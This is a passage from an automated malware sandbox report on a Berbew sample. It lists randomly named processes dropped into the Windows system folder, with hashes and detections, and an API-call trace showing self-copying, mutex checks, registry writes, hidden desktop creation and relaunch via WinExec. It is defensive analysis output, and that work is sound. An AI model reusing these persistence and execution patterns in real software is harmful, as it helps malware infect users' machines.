                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000020.00000002.2019682823.000000000042A000.00000004.00000001.01000000.00000023.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:33
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Emogai32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Emogai32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:E5B571BCF3D5D371B03E73AAAE92245B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000021.00000002.2021263243.000000000042A000.00000004.00000001.01000000.00000024.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:34
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Efgkjnfn.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Efgkjnfn.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B024F2548F4F6ADC9F3DCD68E53CB2CC
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000022.00000002.2022377114.000000000042A000.00000004.00000001.01000000.00000025.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:35
                          Start time:19:59:00
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Eoappk32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Eoappk32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:B8C0A2511B4FA693AE579E90FCE526AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000023.00000002.2027822384.000000000042A000.00000004.00000001.01000000.00000026.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:36
                          Start time:19:59:01
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Fkogfkdj.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Fkogfkdj.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:151422544613301F6704413C52E381B0
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000024.00000002.2029071325.000000000042A000.00000004.00000001.01000000.00000027.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:37
                          Start time:19:59:01
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Fhedeo32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Fhedeo32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:03114EFDB305B36B603B7F89B84FE057
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000025.00000002.2029721811.000000000042A000.00000004.00000001.01000000.00000028.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:38
                          Start time:19:59:01
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Feidnc32.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Feidnc32.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:635F3B50D2C2626B8575FD1AD6A4CE99
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000026.00000002.2030625851.000000000042A000.00000004.00000001.01000000.00000029.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:39
                          Start time:19:59:01
                          Start date:30/10/2024
                          Path:C:\Windows\SysWOW64\Foaigifk.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\system32\Foaigifk.exe
                          Imagebase:0x400000
                          File size:131'072 bytes
                          MD5 hash:1FC2CFC732D1C3E7577F946BB2663E80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Berbew, Description: Yara detected Berbew, Source: 00000027.00000002.2031051927.000000000042A000.00000004.00000001.01000000.0000002A.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:20.1%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2706 403840 printf 2707 403880 2706->2707 2708 403884 printf 2707->2708 2709 40386d printf 2707->2709 2709->2707 2715 4052e0 2716 4052ec strcat strcat 2715->2716 2732 40431f 2716->2732 2719 405360 2720 40537c CreateProcessA 2719->2720 2721 405469 2720->2721 2722 4053ac CloseHandle sprintf 2720->2722 2723 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2721->2723 2724 405413 2722->2724 2725 4054d0 2723->2725 2726 4053e5 FindWindowA 2724->2726 2727 40541d 2724->2727 2726->2727 2728 405402 Sleep 2726->2728 2727->2721 2729 405421 Sleep 2727->2729 2728->2724 2730 405434 Sleep 2729->2730 2731 40543e GetWindowTextA 2729->2731 2730->2731 2731->2721 2733 404341 GetCurrentThreadId GetThreadDesktop 2732->2733 2734 404364 CreateDesktopA 2732->2734 2735 40438e SetThreadDesktop 2733->2735 2736 40435f memset 2733->2736 2734->2735 2734->2736 2735->2736 2736->2719 2736->2720 2839 401581 2840 4015c8 2839->2840 2841 4015a2 rand 2840->2841 2842 4015cc 2840->2842 2841->2840 2737 403562 GetModuleFileNameA 2738 403588 2737->2738 2999 402ba3 3000 402a89 2999->3000 3001 402cd2 3000->3001 3002 402cad GetCurrentProcessId 3000->3002 3003 402b2a GetModuleHandleA GetProcAddress 3000->3003 3002->3000 3003->3000 2739 4077e4 2740 407808 2739->2740 2747 40789e 2739->2747 2741 407820 SetFocus 2740->2741 2742 40782b 2740->2742 2740->2747 2741->2742 2743 407833 SetFocus 2742->2743 2744 40783e 2742->2744 2743->2744 2745 407857 2744->2745 2746 40784c SetFocus 2744->2746 2748 40786a 2745->2748 2749 40785f SetFocus 2745->2749 2746->2745 2752 407910 2747->2752 2753 4078fe CallWindowProcA 2747->2753 2750 407872 SetFocus 2748->2750 2751 40787d 2748->2751 2749->2748 2750->2751 2751->2747 2754 407885 SetFocus 2751->2754 2753->2752 2754->2747 2843 405c09 lstrlenA GetTickCount srand 2876 40509b 2843->2876 2848 405f54 2849 405caf ExpandEnvironmentStringsA 2890 40570c 2849->2890 2852 405ceb strcat strcat 2853 40431f 4 API calls 2852->2853 2854 405d14 memset 2853->2854 2855 405d72 CreateProcessA 2854->2855 2856 405d56 2854->2856 2857 405da2 CloseHandle sprintf 2855->2857 2858 405f24 DeleteFileA TerminateProcess CloseHandle 2855->2858 2856->2855 2859 405e09 2857->2859 2858->2848 2860 405e13 2859->2860 2861 405ddb FindWindowA 2859->2861 2860->2858 2863 405e1b Sleep GetWindowTextA 2860->2863 2861->2860 2862 405df8 Sleep 2861->2862 2862->2859 2864 405e50 2863->2864 2864->2858 2929 405613 2864->2929 2866 405e6b 2866->2858 2867 405e76 CopyFileA 2866->2867 2868 403619 5 API calls 2867->2868 2869 405e9c DeleteFileA lstrlenA strncmp 2868->2869 2870 405ec6 lstrlenA 2869->2870 2871 405eef 2869->2871 2937 403743 CreateFileA 2870->2937 2873 403743 4 API calls 2871->2873 2874 405eea LocalFree 2873->2874 2874->2858 2877 4050ea 2876->2877 2878 4050b6 sprintf 2877->2878 2879 4050f8 2877->2879 2940 4041f4 2878->2940 2880 4041f4 4 API calls 2879->2880 2882 40510e 2880->2882 2943 4041c3 lstrlenA 2882->2943 2885 40429c RegOpenKeyExA 2886 4042e0 RegQueryValueExA 2885->2886 2887 4042dc 2885->2887 2888 404304 RegCloseKey 2886->2888 2889 4042f8 RegCloseKey 2886->2889 2887->2848 2887->2849 2888->2887 2889->2887 2891 4079e4 2890->2891 2892 405719 GetTempPathA 2891->2892 2893 405746 2892->2893 2893->2893 2951 4015ea 2893->2951 2896 405798 strcat 2897 4057ac rand 2896->2897 2898 4057e7 rand 2897->2898 2899 4057be rand sprintf 2897->2899 2900 4057f9 strcat 2898->2900 2901 40580d strcat rand 2898->2901 2899->2898 2900->2901 2902 405839 strcat 2901->2902 2903 40584d rand 2901->2903 2902->2903 2904 405888 sprintf rand 2903->2904 2905 40585f rand sprintf 2903->2905 2906 4058c3 strcat 2904->2906 2907 4058d7 strcat rand 2904->2907 2905->2904 2906->2907 2908 405911 strcat rand 2907->2908 2909 4058fd strcat 2907->2909 2910 405966 strcat rand 2908->2910 2911 40593d rand sprintf 2908->2911 2909->2908 2912 4059a0 strcat rand 2910->2912 2913 40598c strcat 2910->2913 2911->2910 2914 4059d2 strcat 2912->2914 2915 4059e6 strcat rand 2912->2915 2913->2912 2914->2915 2916 405a20 sprintf rand 2915->2916 2917 405a0c strcat 2915->2917 2918 405a70 strcat rand 2916->2918 2919 405a5c strcat 2916->2919 2917->2916 2920 405ab0 rand sprintf rand 2918->2920 2921 405a9c strcat 2918->2921 2919->2918 2922 405af3 strcat 2920->2922 2923 405b07 strcat rand 2920->2923 2921->2920 2922->2923 2924 405b39 strcat 2923->2924 2925 405b4d rand 2923->2925 2924->2925 2926 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2925->2926 2927 405b5f rand sprintf 2925->2927 2928 405c04 2926->2928 2927->2926 2928->2848 2928->2852 2930 4079e4 2929->2930 2931 405620 FindFirstUrlCacheEntryA 2930->2931 2932 405663 _stricmp 2931->2932 2933 405685 2931->2933 2932->2933 2934 4056a7 FindNextUrlCacheEntryA 2932->2934 2933->2866 2934->2933 2935 4056c9 _stricmp 2934->2935 2935->2933 2936 4056fb 2935->2936 2936->2934 2938 403775 2937->2938 2939 403779 SetFilePointer WriteFile CloseHandle 2937->2939 2938->2874 2939->2938 2946 40421f RegCreateKeyExA 2940->2946 2944 40421f 4 API calls 2943->2944 2945 4041ee InterlockedIncrement memset 2944->2945 2945->2885 2947 404262 RegSetValueExA 2946->2947 2948 404219 2946->2948 2949 404288 RegCloseKey 2947->2949 2950 40427c RegCloseKey 2947->2950 2948->2877 2949->2948 2950->2948 2952 401634 2951->2952 2953 401638 strcat sprintf rand 2952->2953 2954 40160e rand 2952->2954 2953->2896 2953->2897 2954->2952 3004 4037aa 3006 4037c8 printf printf 3004->3006 3007 40380d 3006->3007 3008 4037fa printf 3007->3008 3010 403812 printf 3007->3010 3008->3007 3011 4035ab 3012 4079e4 3011->3012 3013 4035b8 vsprintf 3012->3013 3016 4035f9 MessageBoxA 3013->3016 3015 4035ea 3016->3015 2755 40686c lstrlenA 2756 405f5b 9 API calls 2755->2756 2757 40689a 2756->2757 2758 4068a1 WinExec 2757->2758 2759 4068a9 2757->2759 2758->2759 2955 40328f 2965 402efd 2955->2965 2956 402cd7 3 API calls 2956->2965 2957 4033ce 2958 40289a 4 API calls 2958->2965 2959 4030e5 GetModuleHandleA 2959->2965 2960 40314c VirtualQuery 2961 4031b1 IsBadWritePtr 2960->2961 2960->2965 2961->2965 2962 402f98 GlobalMemoryStatus 2962->2965 2963 402f6f IsBadReadPtr 2963->2965 2964 403059 CloseHandle 2964->2965 2965->2956 2965->2957 2965->2958 2965->2959 2965->2960 2965->2962 2965->2963 2965->2964 2966 407892 2967 40789e 2966->2967 2968 407910 2967->2968 2969 4078fe CallWindowProcA 2967->2969 2969->2968 3017 405133 10 API calls 3018 40429c 4 API calls 3017->3018 3019 405264 3018->3019 3020 405278 3019->3020 3021 40526b LocalFree 3019->3021 3023 40509b 6 API calls 3020->3023 3022 4054d0 3021->3022 3024 40527d ExpandEnvironmentStringsA 3023->3024 3043 404532 3024->3043 3027 4052d3 LocalFree 3027->3022 3028 4052ec strcat strcat 3029 40431f 4 API calls 3028->3029 3030 405315 memset 3029->3030 3031 405360 3030->3031 3032 40537c CreateProcessA 3030->3032 3031->3032 3033 4053ac CloseHandle sprintf 3032->3033 3042 405469 3032->3042 3035 405413 3033->3035 3034 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3034->3022 3036 4053e5 FindWindowA 3035->3036 3037 40541d 3035->3037 3036->3037 3038 405402 Sleep 3036->3038 3039 405421 Sleep 3037->3039 3037->3042 3038->3035 3040 405434 Sleep 3039->3040 3041 40543e GetWindowTextA 3039->3041 3040->3041 3041->3042 3042->3034 3044 40453f 3043->3044 3045 403619 5 API calls 3044->3045 3046 404570 3045->3046 3047 404579 3046->3047 3048 404596 lstrlenA LocalAlloc GetTempPathA 3046->3048 3049 404589 LocalFree 3046->3049 3047->3027 3047->3028 3050 404604 3048->3050 3049->3047 3050->3050 3051 4015ea rand 3050->3051 3052 40461d strcat sprintf rand 3051->3052 3053 404655 strcat 3052->3053 3054 404668 rand 3052->3054 3053->3054 3055 40467a rand sprintf 3054->3055 3056 40469d rand 3054->3056 3055->3056 3057 4046bb strcat 3056->3057 3058 4046ce strcat rand 3056->3058 3057->3058 3059 4046f3 strcat 3058->3059 3060 404706 rand 3058->3060 3059->3060 3061 404741 sprintf rand 3060->3061 3062 40471e rand sprintf 3060->3062 3063 404770 strcat 3061->3063 3064 404783 strcat rand 3061->3064 3062->3061 3063->3064 3065 4047a8 strcat 3064->3065 3066 4047bb strcat rand 3064->3066 3065->3066 3067 4047e6 rand sprintf 3066->3067 3068 404809 rand sprintf sprintf rand 3066->3068 3067->3068 3069 404859 rand sprintf 3068->3069 3070 40487c rand 3068->3070 3069->3070 3071 404894 strcat 3070->3071 3072 4048a7 rand 3070->3072 3071->3072 3073 4048b9 strcat 3072->3073 3074 4048cc rand 3072->3074 3073->3074 3075 4048f1 sprintf rand 3074->3075 3076 4048de strcat 3074->3076 3077 404926 strcat 3075->3077 3078 404939 rand 3075->3078 3076->3075 3077->3078 3079 40494b strcat 3078->3079 3080 40495e rand 3078->3080 3079->3080 3081 404976 rand sprintf 3080->3081 3082 404999 3080->3082 3081->3082 3088 4049a3 3082->3088 3109 404b12 3082->3109 3083 404b07 3085 404c87 strcat rand 3083->3085 3084 4043bf 2 API calls 3084->3109 3086 404cac strcat 3085->3086 3087 404cbf rand 3085->3087 3086->3087 3091 404cd1 strcat 3087->3091 3092 404ce4 rand 3087->3092 3088->3083 3089 404a4b sprintf rand 3088->3089 3090 4049d9 sprintf 3088->3090 3093 404a82 strcat 3089->3093 3094 404a95 rand 3089->3094 3090->3088 3091->3092 3096 404cf6 strcat 3092->3096 3097 404d09 strcat rand 3092->3097 3093->3094 3098 404aa7 strcat 3094->3098 3099 404aba rand 3094->3099 3095 404b47 sprintf 3095->3109 3096->3097 3100 404d34 rand sprintf 3097->3100 3101 404d57 rand 3097->3101 3098->3099 3099->3088 3102 404acc strcat 3099->3102 3100->3101 3103 404d69 strcat 3101->3103 3104 404d7c rand 3101->3104 3102->3088 3103->3104 3105 404da1 rand 3104->3105 3106 404d8e strcat 3104->3106 3107 404db9 strcat 3105->3107 3108 404dcc rand 3105->3108 3106->3105 3107->3108 3110 404e01 strcat rand 3108->3110 3111 404dde rand sprintf 3108->3111 3109->3084 3109->3085 3109->3095 3136 40447a lstrlenA LocalAlloc 3109->3136 3113 404e2c strcat 3110->3113 3114 404e3f strcat rand 3110->3114 3111->3110 3113->3114 3116 404e64 strcat 3114->3116 3117 404e77 strcat rand 3114->3117 3116->3117 3120 404ea2 strcat 3117->3120 3121 404eb5 sprintf rand 3117->3121 3118 404c02 rand 3122 404c14 strcat 3118->3122 3123 404c27 rand 3118->3123 3119 404bef strcat 3119->3118 3120->3121 3126 404ee3 strcat 3121->3126 3127 404ef6 strcat rand 3121->3127 3122->3123 3124 404c39 strcat 3123->3124 3125 404c4c LocalFree 3123->3125 3124->3125 3125->3109 3126->3127 3128 404f27 strcat 3127->3128 3129 404f3a rand sprintf rand 3127->3129 3128->3129 3130 404f77 strcat 3129->3130 3131 404f8a strcat rand 3129->3131 3130->3131 3132 404fb5 strcat 3131->3132 3133 404fc8 rand 3131->3133 3132->3133 3134 404fda rand sprintf 3133->3134 3135 404ffd 7 API calls 3133->3135 3134->3135 3135->3047 3137 4044b6 3136->3137 3138 4044d9 sprintf 3137->3138 3139 40452a sprintf rand 3137->3139 3138->3137 3139->3118 3139->3119 3140 401b33 3143 401aa4 3140->3143 3141 401b13 3142 401ae6 sprintf 3145 40129c 3142->3145 3143->3141 3143->3142 3146 4012a9 CreateFileA 3145->3146 3147 4079e4 3145->3147 3148 4012db ReadFile CloseHandle 3146->3148 3149 4012d7 3146->3149 3147->3146 3148->3149 3149->3141 3150 4036b3 CreateFileA 3151 4036e3 3150->3151 3152 4036e7 SetFilePointer 3150->3152 3153 403701 3152->3153 3153->3153 3154 403708 WriteFile WriteFile CloseHandle 3153->3154 3154->3151 2760 406ff6 2761 4071a4 2760->2761 2762 40701f 2760->2762 2763 40717e 2761->2763 2764 4071be DestroyWindow 2761->2764 2765 407021 2762->2765 2766 40702f 2762->2766 2764->2763 2767 407184 2765->2767 2768 40702a 2765->2768 2769 407289 GetWindowTextA 2766->2769 2770 40703a 2766->2770 2767->2763 2771 407198 PostQuitMessage 2767->2771 2772 4077cc DefWindowProcA 2768->2772 2775 4072c9 GetWindowTextA 2769->2775 2776 4072a9 MessageBoxA SetFocus 2769->2776 2773 407041 2770->2773 2774 40705c 2770->2774 2771->2763 2772->2763 2773->2768 2773->2772 2780 4071cb 2773->2780 2779 407149 2774->2779 2816 405ffa 2774->2816 2777 407322 2775->2777 2778 407302 MessageBoxA SetFocus 2775->2778 2776->2763 2784 407337 MessageBoxA SetFocus 2777->2784 2793 407357 2777->2793 2778->2763 2779->2763 2823 406075 2779->2823 2780->2763 2786 407224 SetTextColor 2780->2786 2788 407233 SetTextColor 2780->2788 2784->2763 2785 405ffa 3 API calls 2787 40709b GetWindowRect 2785->2787 2789 40723d SetBkColor CreateBrushIndirect 2786->2789 2787->2779 2790 4070be GetWindowRect 2787->2790 2788->2789 2789->2763 2790->2779 2792 4070d4 2790->2792 2791 4073a7 sprintf GetWindowTextA 2795 40740f sprintf GetWindowTextA 2791->2795 2796 4073ef MessageBoxA SetFocus 2791->2796 2792->2779 2797 407112 MoveWindow 2792->2797 2793->2791 2794 407376 MessageBoxA SetFocus 2793->2794 2794->2763 2798 407477 sprintf GetWindowTextA 2795->2798 2799 407457 MessageBoxA SetFocus 2795->2799 2796->2763 2797->2779 2800 4074d9 2798->2800 2801 4074b9 MessageBoxA SetFocus 2798->2801 2799->2763 2802 4074ee MessageBoxA SetFocus 2800->2802 2804 40750e 2800->2804 2801->2763 2802->2763 2803 40755e sprintf GetWindowTextA 2806 4075a6 MessageBoxA SetFocus 2803->2806 2807 4075c6 2803->2807 2804->2803 2805 40752d MessageBoxA SetFocus 2804->2805 2805->2763 2806->2763 2808 407627 sprintf CreateFileA SetFilePointer 2807->2808 2809 4075e5 MessageBoxA SetFocus 2807->2809 2810 40768e 2808->2810 2809->2763 2810->2810 2811 407695 WriteFile WriteFile 2810->2811 2812 4076db 2811->2812 2812->2812 2813 4076e2 6 API calls 2812->2813 2814 40776e 2813->2814 2814->2814 2815 407775 WriteFile WriteFile CloseHandle ShowWindow 2814->2815 2815->2763 2817 4079e4 2816->2817 2818 406007 GetWindow 2817->2818 2820 406020 2818->2820 2819 406028 GetClassNameA 2819->2820 2820->2819 2821 406024 2820->2821 2822 40605f GetWindow 2820->2822 2821->2785 2822->2820 2824 405ffa 3 API calls 2823->2824 2825 406096 2824->2825 2826 405ffa 3 API calls 2825->2826 2827 4060a3 10 API calls 2826->2827 2828 406224 SendMessageA 2827->2828 2829 40623a SendMessageA 2827->2829 2830 40624e CreateWindowExA CreateWindowExA 2828->2830 2829->2830 2831 406333 2830->2831 2832 4062cb sprintf SendMessageA sprintf SendMessageA 2831->2832 2833 40633c 34 API calls 2831->2833 2832->2831 2833->2763 2970 401219 2971 40121f __GetMainArgs 2970->2971 2972 407980 173 API calls 2971->2972 2973 401284 exit 2972->2973 2974 40109a 2982 40109b 2974->2982 2975 40117f 2976 40118e signal 2975->2976 2977 4011a8 signal 2976->2977 2978 4011c9 2976->2978 2977->2978 2979 40117b 2977->2979 2978->2979 2980 4011ce signal raise 2978->2980 2980->2979 2982->2975 2982->2976 2982->2979 2983 40107a RtlUnwind 2982->2983 2983->2982 2834 40237b 2835 402333 _sleep 2834->2835 2836 402355 2834->2836 2837 401b9f 23 API calls 2835->2837 2838 40234c 2837->2838 2838->2835 2838->2836 2984 40109b 2985 40117f 2984->2985 2992 4010c3 2984->2992 2986 40118e signal 2985->2986 2987 4011a8 signal 2986->2987 2988 4011c9 2986->2988 2987->2988 2989 40117b 2987->2989 2988->2989 2990 4011ce signal raise 2988->2990 2990->2989 2992->2986 2992->2989 2993 40107a RtlUnwind 2992->2993 2993->2992 2994 40129b 2995 4079e4 2994->2995 2996 4012a9 CreateFileA 2995->2996 2997 4012db ReadFile CloseHandle 2996->2997 2998 4012d7 2996->2998 2997->2998 2710 40365e 2711 403664 GetFileSize LocalAlloc 2710->2711 2712 403684 ReadFile CloseHandle 2711->2712 2714 4036ae 2712->2714 2529 40121f __GetMainArgs 2532 407980 GetCommandLineA 2529->2532 2533 407991 strchr 2532->2533 2535 4079a6 2532->2535 2534 4079cf GetModuleHandleA 2533->2534 2533->2535 2538 406c29 OpenMutexA 2534->2538 2535->2534 2539 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2538->2539 2540 406c5f CloseHandle exit 2538->2540 2541 406cd6 2539->2541 2540->2539 2542 406ce4 rand 2541->2542 2543 406e07 9 API calls 2541->2543 2545 406d5f 2542->2545 2585 402e06 2543->2585 2547 406d69 rand 2545->2547 2548 406d2f rand 2545->2548 2551 406d8a sprintf CopyFileA 2547->2551 2552 406d7c 2547->2552 2548->2545 2549 406f65 2601 4023a7 CreateThread CloseHandle 2549->2601 2550 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2550->2549 2562 403ce9 rand 2551->2562 2552->2551 2556 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2558 406fdc GetMessageA 2556->2558 2653 4068b0 2556->2653 2671 40682b 2556->2671 2560 406fc4 TranslateMessage DispatchMessageA 2558->2560 2561 401284 exit 2558->2561 2560->2558 2563 403d27 2562->2563 2564 403d2e 2562->2564 2573 403f68 rand 2563->2573 2602 403619 CreateFileA 2564->2602 2567 403d47 memcpy memset 2569 403da1 rand rand rand rand memcpy 2567->2569 2570 403e64 2569->2570 2608 403bbe 2570->2608 2574 404002 2573->2574 2575 403fd4 rand 2574->2575 2576 404009 rand 2574->2576 2575->2574 2577 40402a 6 API calls 2576->2577 2578 40401c 2576->2578 2613 404148 RegCreateKeyExA 2577->2613 2578->2577 2580 4040f5 2581 404148 3 API calls 2580->2581 2582 404125 2581->2582 2583 404148 3 API calls 2582->2583 2584 40413a WinExec ExitProcess 2583->2584 2586 402e13 2585->2586 2616 402822 6 API calls 2586->2616 2588 402e1b GetVersion 2589 402e2e 2588->2589 2590 402e79 LoadLibraryA GetProcAddress 2589->2590 2600 402ef6 2589->2600 2590->2589 2591 4033ce GetVersion 2591->2549 2591->2550 2593 4030e5 GetModuleHandleA 2593->2600 2594 40314c VirtualQuery 2595 4031b1 IsBadWritePtr 2594->2595 2594->2600 2595->2600 2596 402f98 GlobalMemoryStatus 2596->2600 2597 402f6f IsBadReadPtr 2597->2600 2598 403059 CloseHandle 2598->2600 2600->2591 2600->2593 2600->2594 2600->2596 2600->2597 2600->2598 2617 40289a 2600->2617 2621 402cd7 2600->2621 2601->2556 2630 4022ee 2601->2630 2603 403664 GetFileSize LocalAlloc 2602->2603 2604 40364e 2602->2604 2605 403684 ReadFile CloseHandle 2603->2605 2604->2603 2607 4036ae 2604->2607 2605->2607 2607->2563 2607->2567 2610 403bfd 2608->2610 2609 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2609->2563 2610->2609 2611 403c20 rand 2610->2611 2612 403c80 memset memcpy memcpy 2610->2612 2611->2610 2612->2610 2614 404193 2613->2614 2614->2614 2615 40419a RegSetValueExA RegCloseKey 2614->2615 2615->2580 2616->2588 2618 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2617->2618 2620 4029cd 2618->2620 2620->2600 2622 402ceb 2621->2622 2624 402d13 2622->2624 2625 402a72 2622->2625 2624->2600 2628 402a89 2625->2628 2626 402cd2 2626->2624 2627 402b2a GetModuleHandleA GetProcAddress 2627->2628 2628->2626 2628->2627 2629 402cad GetCurrentProcessId 2628->2629 2629->2628 2631 402333 _sleep 2630->2631 2635 401b9f 2631->2635 2651 4079e4 2635->2651 2652 4079e5 2651->2652 2652->2652 2668 4068c7 2653->2668 2655 406c0c _sleep 2655->2668 2656 403619 5 API calls 2656->2668 2658 406c01 LocalFree 2658->2655 2659 406941 sscanf 2660 406972 rand 2659->2660 2659->2668 2660->2668 2661 406a84 atoi 2664 406aad sprintf 2661->2664 2661->2668 2662 4069a4 sprintf sprintf 2665 406a27 DeleteFileA sprintf WinExec 2662->2665 2663 4069db GetWindowsDirectoryA sprintf strcat 2663->2665 2664->2668 2665->2668 2666 406add lstrlenA 2666->2668 2667 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2667->2668 2668->2655 2668->2656 2668->2658 2668->2659 2668->2661 2668->2662 2668->2663 2668->2666 2668->2667 2669 406b9b lstrlenA 2668->2669 2670 406bbe CreateThread CloseHandle 2668->2670 2675 405f5b lstrlenA lstrlenA LocalAlloc 2668->2675 2680 4043bf 2668->2680 2669->2668 2670->2668 2672 40683b 2671->2672 2688 406753 CreateFileA 2672->2688 2686 407a04 2675->2686 2677 405f9b lstrlenA 2687 407a04 2677->2687 2679 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2679->2668 2681 4043dc 2680->2681 2682 40441a 2681->2682 2684 4043e2 memcpy 2681->2684 2683 404441 lstrlenA 2682->2683 2685 40442f 2682->2685 2683->2685 2684->2685 2685->2668 2686->2677 2687->2679 2689 40678f GetFileSize CloseHandle 2688->2689 2695 40681a _sleep 2688->2695 2696 4013cc RegOpenKeyExA 2689->2696 2695->2672 2697 4013fa 2696->2697 2698 4013fe RegQueryValueExA RegCloseKey 2696->2698 2697->2695 2699 4054d7 6 API calls 2697->2699 2698->2697 2700 405586 2699->2700 2701 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2700->2701 2702 40560e 2701->2702 2702->2695 2703 401348 RegCreateKeyExA 2702->2703 2704 40138a RegSetValueExA RegCloseKey 2703->2704 2705 401386 2703->2705 2704->2705 2705->2695

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
